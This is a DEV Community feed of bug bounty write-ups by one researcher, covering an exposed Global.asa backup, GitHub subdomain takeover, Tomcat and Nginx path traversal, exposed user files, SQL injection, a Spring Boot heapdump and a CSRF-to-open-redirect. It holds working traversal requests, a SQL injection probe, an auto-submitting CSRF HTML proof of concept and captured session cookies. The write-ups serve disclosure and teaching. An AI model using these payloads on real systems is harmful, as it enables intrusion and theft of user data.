DEV Community: João Victor

Global.asa backup file found

João Victor — Fri, 13 Jun 2025 15:38:02 +0000

Reward : $2500

Overview of the Vulnerability

A backup copy of the Global.asa file was found publicly accessible on the web server. This file is commonly used in classic ASP applications and may contain sensitive information, such as database connection strings, file paths, application-level settings, or authentication logic. If exposed, it can assist an attacker in gaining deeper access to the application or underlying infrastructure.

Steps to Reproduce

During a fuzzing process using the wordlist available at:
https://raw.githubusercontent.com/onvio/wordlists/master/words_and_files_top5000.txt

we discovered the following publicly accessible backup file:

https://cangacei[.]ro/Global.asa.bak

This file was successfully downloaded and, upon inspection, it was found to contain plaintext credentials along with instructions pointing to another directory within the application. By following this path, we were able to access additional sensitive information, including:
Details from other customers
Internal support tickets and communication
Application-specific configuration data

This exposure represents a significant security risk, as it provides direct access to internal application logic, user data, and potentially database systems.

Github subdomain takeover

João Victor — Wed, 29 Jan 2025 21:08:33 +0000

reward: 200$

Description

A subdomain takeover is when a misconfigured Domain Name System (DNS) record is re-registered to an endpoint owned by an attacker. An attacker is then able to redirect users to the endpoint and capture data such as cookies and credentials, perform Cross-Site Scripting (XSS) attacks, and potentially take over accounts in the legitimate application.

A subdomain takeover vulnerability was identified which could impact the reputation and brand of the business. An attacker can register a subdomain on behalf of the target domain and use it for spamming and phishing attacks.

Business Impact

Subdomain takeover can lead to data theft and indirect financial loss through the attacker’s ability to interact with legitimate users. These malicious actions could also result in reputational damage for the business through the impact to customers’ trust.

Steps to Reproduce

Go to new repository page
Set Repository name to canonical domain name (i.e., {something}.github.io from CNAME record)
Click Create repository
Push content using git to a newly created repo. GitHub itself provides the steps to achieve it
Switch to Settings tab
In GitHub Pages section choose master branch as source
Click Save
After saving, set Custom domain to source domain name (i.e., the domain name which you want to take over)
Click Save

PoC

Status

Resolved

Path traversal via reverse proxy mapping

João Victor — Thu, 19 Dec 2024 16:04:05 +0000

Reward $100

Overview of the Vulnerability

Path traversal uses a server misconfiguration to access hidden files and directories that are stored on the served web application. This can include sensitive operating files, code and data that runs the application, or in some cases, user credentials.

An attacker can leverage the path traversal vulnerability in this application to gain access to system files in a folder of a directory that is not intended for public access.
Tomcat will threat the sequence /..;/ as /../ and normalize the path while reverse proxies will not normalize this sequence and send it to Apache Tomcat as it is.

This allows an attacker to access Apache Tomcat resources that are not normally accessible via the reverse proxy mapping.

Business Impact

Path traversal can lead to reputational damage for the business due to a loss in confidence and trust by users. It can also result in data theft and indirect financial losses to the business through the costs of notification and rectifying and breached PII data if an attacker can successfully exfiltrate user data.
An attacker can inject path traversal sequences such as /..;/ and access Apache Tomcat resources that are not normally mapped via the reverse proxy mapping.

Steps to Reproduce

Reply this request:

GET /axis2//..;/ HTTP/1.1
Cookie: JSESSIONID=35287FC413AC61BB9B76A853DBAF0DC7; sftlc=O3BU01JCA7NJ1P9527N7QX3JBS81K7I8; JSESSIONID=A80093E984D73E98210B41D334FE50C8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: c4ng4c31r0.com
Connection: Keep-alive

PoC:

PS: The triage changed the severity to P1 (critical), but the company changed it to P4 (low), claiming it was a "WAF misconfiguration".

Status: Resolved
Reward: 100$

Massive users data exposure

João Victor — Thu, 27 Jun 2024 20:01:56 +0000

Reward $1500

Overview of the Vulnerability
Sensitive data exposure can occur when sensitive data is not encrypted, or behind an authorization barrier. When this information is exposed it can place sensitive data, such as secrets, at risk. This can occur due to a variety of scenarios such as not encrypting data, SSL not being used for authenticated pages, or passwords being stored using unsalted hashes. Examples of such data include, but are not limited to: personally identifiable information (PII), Social Security numbers, medical data, banking information, and login credentials.

Sensitive data relating to the business was exposed. This data could be exfiltrated and used by an attacker to sell access to databases and database content, or use credentials identified to take over accounts, amongst other attack vectors.

When performing an analysis at the root of the application, it was possible to find a file "users.csv", which contains information on 5412 users.
The information is: ID, Username, Title, First name, Last name, email, and status (active or inactive).
Information like this is very important, particularly for phishing attacks and social engineering as a whole.

Steps to Reproduce
Access the url below and it will perform an automatic download of the mentioned file:
https://c4ng4c31r0[.]com/users.csv
https://c4ng4c31r0[.]com/users.xlsx

Proof of Concept (PoC)

Status:
Resolved.

Reward:

Authenticated SQL Injection

João Victor — Thu, 13 Jun 2024 13:21:28 +0000

Reward: $300
Program: Private

Overview
SQL injection (SQLi) is a vulnerability in which an application accepts input into an SQL statement and treats this input as part of the statement. Typically, SQLi allows a malicious attacker to view, modify or delete data that should not be able to be retrieved. An SQLi vulnerability was found for this host which allows an attacker to execute code and view data from the SQL service by submitting SQL queries.

An attacker could exploit this lack of input sanitization to exfiltrate database data and files, tamper with the data, or perform resource exhaustion. Depending on the database and how it is configured, an attacker could potentially remotely execute code on the server running the database.

Business Impact
Data exfiltration through a SQLi attack could lead to reputational damage or regulatory fines for the business due to an attacker’s unauthorized access to data. This could also result in reputational damage for the business through the impact to customers’ trust. The severity of the impact to the business is dependent on the sensitivity of the data being stored in, and transmitted by the application.

PoC

Click on "view" and then on the highlighted download icon, right click and click on "copy url"

Modify param "pcrc" to add single quote and view error which states 'SQL Syntax Error' at https://site.com/web_gtr/download.php?opc=1&anio=XXX&familia=XXX&pcrc=c4ng4c31r0'

to explore quickly and automatically, the sqlmap tool was used.
To replicate, we save the request intercepted by burp suite in a file and use it as a basis for making requests.

Reward/Status:

Sensitive Information disclosure via Spring Boot Default Paths

João Victor — Fri, 07 Jun 2024 20:57:22 +0000

Reward: $250
Program: Private

Overview of the Vulnerability
Disclosure of secrets for a publicly available asset occurs when sensitive data is not behind an authorization barrier. When this information is exposed it can place sensitive data, such as secrets, at risk. This can occur due to a variety of scenarios such as not encrypting data, secrets committed to GitHub within public repositories, or exposed external assets. Disclosure of secrets for publicly available assets could be leveraged by an attacker to gain privileged access to the application or the environment where the application is hosted. From here, an attacker could execute functions under the guise of an Administrator user, depending on the permissions level they are able to access.

Business Impact
Disclosure of secrets for a publicly available asset can lead to indirect financial loss due to an attacker accessing, deleting, or modifying data from within the application. Reputational damage for the business can also occur via the impact to customers’ trust that these events create. The severity of the impact to the business is dependent on the sensitivity of the data being stored in, and transmitted by the application.

Steps to reproduce:
1 - Use the wordlist [https://github.com/emadshanab/DIR-WORDLISTS/blob/main/spring-boot.txt] to perform a brute force attack on the https://c4ng4c31r0[.]com/api/maintenance/ endpoint.
2 - Note that the heapdump endpoint was identified. When accessing it, an automatic download is performed containing a binary file.
Using visualvm https://visualvm.github.io/, we can read the contents of the file in plain text.

PoC
Using visualvm to decompile and read plain text credentials:

Status/Reward:
Resolved!

CSRF leads to Open redirect

João Victor — Wed, 05 Jun 2024 13:49:11 +0000

Reward: 15$

Overview of the Vulnerability
Open redirects occur when an application accepts user input that is not validated into the target of a redirection. This input causes a redirection to an external domain, manipulating a user by redirecting them to a malicious site. An open redirect was identified which can impact users' ability to trust legitimate web pages. An attacker can send a phishing email that contains a link with a legitimate business name in the URL and the user will be redirected from the legitimate web server to any external domain. Users are less likely to notice subsequent redirects to different domains when an authentic URL with a valid SSL certificate can be used within the phishing link.
This type of attack is also a precursor for more serious vulnerabilities such as Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), Cross-Site Request Forgery (CSRF), or successful phishing attempts where an attacker can harvest users' credentials or gain users' OAuth access by relaying them through an Open Redirection, to a server they control (and can see the inbound requests from).

Business Impact
Open redirects can result in reputational damage for the business as customers' trust is negatively impacted by an attacker sending them to a phishing site to extract login credentials, or coercing them to send a financial transaction.

Steps to Reproduce
Copy and paste the request below into the burp suite using the "Generate CSRF Poc" functionality, create an HTML page and access it via browser (with the same burp proxy)

Request

POST /account/change_language HTTP/2
Host: site.com
Cookie: anon-device-id=4c27c635-6a6f-488f-b9a2-9f29173ff515; __cf_bm=Rac7hxpK8o94OYuHBu0gHix5xW0o11y2VhCwxxB_FR4-1707166647-1-AY6CLDec/7yODhPtCT3RC8iWE1Y6m7OqSf1VTqUO7pToGWcrBI9nnOYtOtQ1q4IiaLJ/vu3GKRnCEJyPWMrGaEw=; _mfp_session=kBbELYGofqGXJmZg0zIGaRo5jp7GSfjdTL6s34tbquYJoS4J1VYF1cPZkd6x2Z4xx8R7OKNpX6OJOndQS%2BN4G%2By0pbfitT5oXfov74Cp89zjaFAtX5s7ER0iMSrpbLnlK2jKRHxyusVX2AvU9v5fGc5ApZM4PL3NNdNsmqcxawJcMInSweGvPuOyFMPVYZnsSvkvWS0ARSviiGtwV%2BVM3LlRaG%2F4TgfDEiovbD%2BaszqwpTJntbX9%2Bb%2F3KjwFwitYeifofA8tvKjngXhky36cBVNBDhaToZwxIFnHZp07zLv%2FaHWEKJV4aV11Y3hT%2FGzfJrJjttWtMJicou7FDNX3eXmHhUkJ8zDX22eLGUVTu6w%3D--6me1Z0vPivn%2BoJTV--XkmHgGy679Gl%2FKNsddY7Cw%3D%3D; __Host-next-auth.csrf-token=a139928ae57b8911a5892a7866026aa63815d65196e4e5c6218aaceabb9d4c8d%7C4c4e2344fbf4063da52b2f3ec8315251ff45a9a1bf6e3dfa6018aa87d031a820; __Secure-next-auth.callback-url=https%3A%2F%2Fwww.myfitnesspal.com; AMP_MKTG_2746a27a28=JTdCJTdE; sp_gam_npa=false; dnsDisplayed=undefined; ccpaApplies=true; signedLspa=undefined; _sp_su=false; cf_clearance=xKv4h6PVvCdNz7Ru5gaJgKtAYmWXoaflj0xDqSOggT0-1707166524-1-AWvQd7Iq4gjsZKptQAw3Q+5trsYPEFKOazWRqcbbdG7Z5Wurf9+pCIlWRXfiNiuMG3qUKUj2euDmAeHb2mor0To=; AMP_2746a27a28=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJlNWQwMzQ0My0yZTdmLTQ0YmItOTRlNy0zMjllNDI1NGNjZTAlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzA3MTY2NTIwNjEwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJsYXN0RXZlbnRUaW1lJTIyJTNBMTcwNzE2NjU0NTAxMSUyQyUyMmxhc3RFdmVudElkJTIyJTNBNSU3RA==; ccpaConsentAll=true; ccpaReject=false; consentStatus=consentedAll; ccpaUUID=215fdb39-e2eb-4b5e-9042-6f2987093e4b; consentUUID=05f64a74-d7ed-4569-8d6d-303333bf8b4b; _dd_s=logs=0&expire=1707167476513&rum=2&id=fb0f58b6-9182-4e3e-92d0-04445647a54f&created=1707166516408; language_setting=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

authenticity_token=%2BpU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN%2BdztJQjvJuWkCsTOPQ==&originating_path=http://www.c4ng4c31r0.com%3F&preference[language_setting]=en

CSRF HTML

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://site.com/account/change_language" method="POST">
      <input type="hidden" name="authenticity&#95;token" value="&#43;pU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN&#43;dztJQjvJuWkCsTOPQ&#61;&#61;" />
      <input type="hidden" name="originating&#95;path" value="http&#58;&#47;&#47;www&#46;c4ng4c31r0&#46;com" />
      <input type="hidden" name="preference&#91;language&#95;setting&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

PoC:

Generation CSRF PoC

Acessing URL generated with PoC

Redirecting

Reward/Status:

Nginx Alias Path Traversal

João Victor — Tue, 04 Jun 2024 20:22:50 +0000

Path Traversal
Overview of the Vulnerability
Path traversal uses a server misconfiguration to access hidden files and directories that are stored on the served web application. This can include sensitive operating files, code and data that runs the application, or in some cases, user credentials.

An attacker can leverage the path traversal vulnerability in this application to gain access to system files in a folder of a directory that is not intended for public access.

Business Impact
Path traversal can lead to reputational damage for the business due to a loss in confidence and trust by users. It can also result in data theft and indirect financial losses to the business through the costs of notification and rectifying and breached PII data if an attacker can successfully exfiltrate user data.

Steps to Reproduce
Use burp to replicate this request:

GET /api../README.md HTTP/2
Host: site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Connection: Keep-alive

Note that it was possible to read the contents of the file.

I performed other checks, but I was unable to read the name of other commonly identified files, but you can better validate by checking the name of other files that actually exist on the server and properly validate the vulnerability.
Also note that the information contained in the readme file is partly from the external environment, where it mentions internal files, shows the execution of a cron job, displays the name of the internal server, among other information.

PoC:

Reward/Status: